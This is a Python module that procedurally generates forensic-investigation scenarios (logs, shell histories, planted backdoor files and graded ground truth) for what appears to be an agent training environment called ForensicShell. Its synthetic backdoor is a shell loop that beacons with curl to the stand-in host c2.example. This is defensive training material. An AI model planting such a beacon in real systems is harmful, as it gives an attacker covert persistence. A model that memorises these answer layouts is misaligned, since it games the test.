forensic-shell / server /scenario_generator.py
yashppawar's picture
Upload folder using huggingface_hub
c36ffd2 verified
"""
Procedural scenario generator for ForensicShell.
Pure function of (seed, difficulty, pattern). Identical inputs always produce
identical scenarios, so seeds work as train/val/test splits and make curricula
reproducible. No global random state is touched.
Public API:
generate_scenario(seed, difficulty=3, pattern=None) -> dict
The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in
scenarios.py — it is a drop-in replacement the env can load through reset().
Difficulty tiers:
    1  easy     user + ip
    2  medium   + modified_files + backdoor_sha256
    3  medium+  same as 2 but more noise
    4  hard     + timeline, with red-herring content
    5  hard+    same as 4 with extra red herrings and more complex timeline
"""
from __future__ import annotations
import hashlib
import random
from datetime import datetime, timedelta
from types import SimpleNamespace
from typing import Dict, Optional
from .attack_patterns import PATTERNS
from .name_pools import (
DECOY_USERS,
HOSTNAMES,
sample_hostname,
sample_internal_ip,
sample_public_ip,
sample_username,
)
# ---------------------------------------------------------------------------
# Deterministic seed → backdoor bytes
# ---------------------------------------------------------------------------
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
    """
    Synthesize the fake backdoor payload for a (seed, pattern) pair.

    The payload is a small shell-script text followed by 32 raw bytes (the
    SHA-256 digest of "<seed>|<pattern>"). Nothing random is involved, so the
    same inputs always give the same bytes and therefore the same hash.

    Returns:
        (payload_bytes, sha256_hex_of_payload, slug) where slug is the first
        six hex characters of md5("<seed>-<pattern>").
    """
    # md5 is used purely as a cheap, stable slug source, not for security.
    slug = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]

    script_lines = [
        "#!/bin/sh",
        f"# synthetic payload {pattern}",
        f"# seed={seed} slug={slug}",
        "while :; do",
        f' curl -s -X POST http://c2.example/beacon -d "id={slug}"',
        " sleep 60",
        "done",
    ]
    script = "".join(line + "\n" for line in script_lines).encode()

    # Binary trailer appended after the script text.
    trailer = hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
    blob = script + trailer
    return blob, hashlib.sha256(blob).hexdigest(), slug
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
    """
    Return the absolute path where the given pattern drops its persistence blob.

    Args:
        pattern_tag: attack pattern name; unrecognized names use /usr/local/bin.
        short: slug used to build the hidden file name (".<short>").
        user: accepted for signature compatibility; not used by this function.
    """
    hidden = f".{short}"
    special_locations = {
        "webshell": f"/var/www/html/{hidden}.bin",
        "supply_chain": f"/tmp/{hidden}",
        # The insider pattern uses a fixed staging path that ignores the slug.
        "insider": "/tmp/.staging/dump.sql",
        "ssh_key_theft": f"/usr/local/sbin/{hidden}",
    }
    return special_locations.get(pattern_tag, f"/usr/local/bin/{hidden}")
# ---------------------------------------------------------------------------
# Filesystem + ground-truth assembly
# ---------------------------------------------------------------------------
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
    """
    Produce benign-looking sshd auth log lines used to pad the real log.

    Args:
        rng: generator providing randint() and choice(); every random value is
            drawn from it, so output is reproducible for a given rng state.
        host: hostname written into each line.
        ts_base: reference time; each line is dated 1-72 hours (plus 0-59
            minutes) before it.
        lines: number of log lines to produce.

    Returns:
        List of log lines in generation order (not sorted by timestamp).
    """
    accounts = ["ops", "alice", "bob", "jenkins", "monitoring", "deploy"]
    event_kinds = ["Accepted publickey", "session opened", "Received disconnect"]

    entries = []
    for _ in range(lines):
        # The order of these draws determines the output for a given seed;
        # do not reorder them.
        back_hours = rng.randint(1, 72)
        back_minutes = rng.randint(0, 59)
        account = rng.choice(accounts)
        src_ip = f"10.0.0.{rng.randint(2, 200)}"
        event = rng.choice(event_kinds)

        when = ts_base - timedelta(hours=back_hours, minutes=back_minutes)
        pid = rng.randint(100, 9999)
        prefix = f"{when.strftime('%b %d %H:%M:%S')} {host} sshd[{pid}]: "

        if event == "session opened":
            # Session lines carry no source port, so no extra draw happens here.
            message = f"pam_unix(sshd:session): session opened for user {account} by (uid=0)"
        else:
            port = rng.randint(30000, 65000)
            if event == "Accepted publickey":
                message = f"Accepted publickey for {account} from {src_ip} port {port} ssh2"
            else:
                message = f"Received disconnect from {src_ip} port {port}:11: disconnected by user"

        entries.append(prefix + message)
    return entries
def _passwd_file(main_user: str, rng) -> str:
    """
    Render /etc/passwd content: root first, then the decoy users and
    main_user in an rng-shuffled order with UIDs counting up from 1000.

    NOTE(review): if main_user can also appear in DECOY_USERS, it would be
    listed twice — confirm against the name pool.
    """
    accounts = [*DECOY_USERS, main_user]
    rng.shuffle(accounts)

    entries = ["root:x:0:0:root:/root:/bin/bash"]
    entries.extend(
        f"{name}:x:{uid}:{uid}:{name.title()},,,:/home/{name}:/bin/bash"
        for uid, name in enumerate(accounts, start=1000)
    )
    return "\n".join(entries) + "\n"
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
    """
    Inject decoy content at difficulty >= 4.

    Args:
        rng: generator providing randint(), choice() and random(); all
            randomness is drawn from it.
        host: hostname written into the decoy log lines.
        ts_base: scenario base timestamp; the decoy log is dated one day
            before it.
        intensity: 1 (diff 4) or 2 (diff 5+). At >= 2 a junk binary and a
            benign cron entry are added on top of the two basic decoys.

    Returns:
        Dict of extra filesystem entries mapping absolute path to content
        (str, or bytes for the junk binary). None of these should end up in
        ground_truth.modified_files.
    """
    extras = {}
    stamp_fmt = "%b %d %H:%M:%S"

    # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP.
    decoy_ip = sample_public_ip(rng)
    probe_ts = ts_base - timedelta(days=1)
    # The disconnect is logged three minutes after the failed password.
    disconnect_ts = probe_ts + timedelta(minutes=3)
    extras["/var/log/auth.log.1"] = (
        f"{probe_ts.strftime(stamp_fmt)} {host} "
        f"sshd[101]: Failed password for invalid user admin from {decoy_ip} "
        f"port {rng.randint(30000, 65000)} ssh2\n"
        f"{disconnect_ts.strftime(stamp_fmt)} {host} "
        f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n"
    )

    # 2. A decoy user's bash_history with suspicious-looking-but-benign commands.
    decoy_user = rng.choice(DECOY_USERS)
    extras[f"/home/{decoy_user}/.bash_history"] = (
        "ls -la\n"
        "sudo systemctl status cron\n"
        "curl https://api.github.com/users/torvalds\n"
        "python3 -m http.server 8000 &\n"
        "pkill -f http.server\n"
    )

    if intensity >= 2:
        # 3. A /tmp/.cache binary with junk bytes — an agent might stat/sha it
        #    and submit the wrong hash.
        junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
        extras["/tmp/.cache"] = junk

        # 4. A decoy cron that looks suspicious but is benign. The em dash in
        #    the comment line is written as a real character rather than the
        #    mis-encoded byte sequence.
        extras["/etc/cron.d/backup-nightly"] = (
            "# Nightly backup — owned by ops team\n"
            "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
        )
    return extras
# ---------------------------------------------------------------------------
# Main public function
# ---------------------------------------------------------------------------
def generate_scenario(
    seed: int,
    difficulty: int = 3,
    pattern: Optional[str] = None,
) -> Dict:
    """
    Deterministic scenario generator.

    All randomness comes from a private random.Random seeded with ``seed``;
    the order of draws below therefore defines the output and must not be
    reordered.

    Args:
        seed: any integer — identical inputs yield identical scenarios
        difficulty: 1..5 (clamped)
        pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed

    Returns:
        dict with keys: task_id, difficulty, description, filesystem, ground_truth.
        ground_truth always has compromised_user and initial_ip; difficulty >= 2
        adds modified_files and backdoor_sha256; difficulty >= 4 adds timeline.

    Raises:
        ValueError: if ``pattern`` is given but is not a key of PATTERNS.
        AssertionError: if the pattern reports a modified path that is not
            present in the assembled filesystem.

    NOTE(review): the module docstring describes tier 3 as "more noise" than
    tier 2, but this function uses the same noise line count for every tier.
    """
    # Clamp into the supported tier range.
    difficulty = max(1, min(5, difficulty))

    rng = random.Random(int(seed))

    # 1. pick pattern
    if pattern is None:
        pattern = rng.choice(list(PATTERNS))
    if pattern not in PATTERNS:
        raise ValueError(f"unknown pattern: {pattern}")

    # 2. sample entities
    host = sample_hostname(rng)
    main_user = sample_username(rng)
    # An insider attacks from inside the network; everyone else from outside.
    if pattern == "insider":
        attacker_ip = sample_internal_ip(rng)
    else:
        attacker_ip = sample_public_ip(rng)

    # 3. base timestamp — always in 2025, deterministic.
    # 2025 has 365 days, so the largest offset that stays in the year is 364;
    # an offset of 365 would land on 2026-01-01.
    day_offset = rng.randint(0, 364)
    hour = rng.randint(8, 22)
    minute = rng.randint(0, 59)
    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)

    # 4. synthesize backdoor payload
    bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern)
    bd_path = _backdoor_path_for(pattern, short, main_user)
    ctx = SimpleNamespace(
        rng=rng,
        user=main_user,
        ip=attacker_ip,
        host=host,
        ts_base=ts_base,
        backdoor_bytes=bd_bytes,
        backdoor_sha256=bd_sha,
        backdoor_path=bd_path,
        short=short,
    )

    # 5. run the pattern template; it shares ``rng`` through ctx.
    result = PATTERNS[pattern](ctx)

    # 6. build filesystem (benign noise lines first, then the attack lines)
    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
    filesystem: Dict[str, object] = {
        "/var/log/auth.log": auth_log,
        f"/home/{main_user}/.bash_history": result["bash_history"],
        "/etc/passwd": _passwd_file(main_user, rng),
        "/etc/hostname": f"{host}\n",
        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
    }
    # add pattern-specific modified files
    filesystem.update(result["modified_files"])

    # 7. red herrings
    if difficulty >= 4:
        intensity = 1 if difficulty == 4 else 2
        herrings = _red_herrings(rng, host, ts_base, intensity)
        for path, content in herrings.items():
            # never overwrite a real artifact
            filesystem.setdefault(path, content)

    # 8. ensure every ground-truth path actually exists in the filesystem.
    # Raised explicitly (not via ``assert``) so the check survives ``python -O``.
    for p in result["modified_paths"]:
        if p not in filesystem:
            raise AssertionError(f"ground-truth path not in filesystem: {p}")

    # 9. assemble ground truth by difficulty tier
    gt: Dict = {
        "compromised_user": main_user,
        "initial_ip": attacker_ip,
    }
    if difficulty >= 2:
        gt["modified_files"] = list(result["modified_paths"])
        gt["backdoor_sha256"] = bd_sha
    if difficulty >= 4:
        gt["timeline"] = list(result["timeline"])

    return {
        "task_id": f"gen_{int(seed)}_d{difficulty}_{pattern}",
        "difficulty": _difficulty_label(difficulty),
        "description": _describe(difficulty, pattern, main_user, host),
        "filesystem": filesystem,
        "ground_truth": gt,
    }
# ---------------------------------------------------------------------------
# Small helpers
# ---------------------------------------------------------------------------
def _difficulty_label(d: int) -> str:
    """Map a numeric tier (1..5) to its label; any other value maps to "medium"."""
    tier_names = ("easy", "medium", "medium", "hard", "hard")
    by_level = dict(enumerate(tier_names, start=1))
    return by_level.get(d, "medium")
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
    """
    Compose the task description shown for a generated scenario.

    The text is a fixed introduction naming the host, a "Report: ..." clause
    that depends on the difficulty (1, 2-3, or anything else), and a trailing
    "(Pattern: ...)" tag.

    Args:
        difficulty: numeric tier selecting which fields the text asks for.
        pattern: attack pattern name echoed in the trailing tag.
        user: accepted for signature compatibility; not used in the text.
        host: hostname quoted in the introduction.
    """
    intro = " ".join((
        f"Host '{host}' was compromised. Investigate the filesystem to determine",
        "what happened. Start by reading /var/log/auth.log and the shell histories",
        "under /home.",
    ))

    if difficulty == 1:
        wanted = "compromised_user and initial_ip only."
    elif difficulty in (2, 3):
        wanted = (
            "compromised_user, initial_ip, modified_files "
            "(absolute paths), and the SHA256 of the attacker-dropped backdoor."
        )
    else:
        wanted = (
            "compromised_user, initial_ip, modified_files, "
            "backdoor_sha256, AND an ordered kill-chain timeline with phases "
            "login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
            "present."
        )
    return f"{intro} Report: {wanted} (Pattern: {pattern})"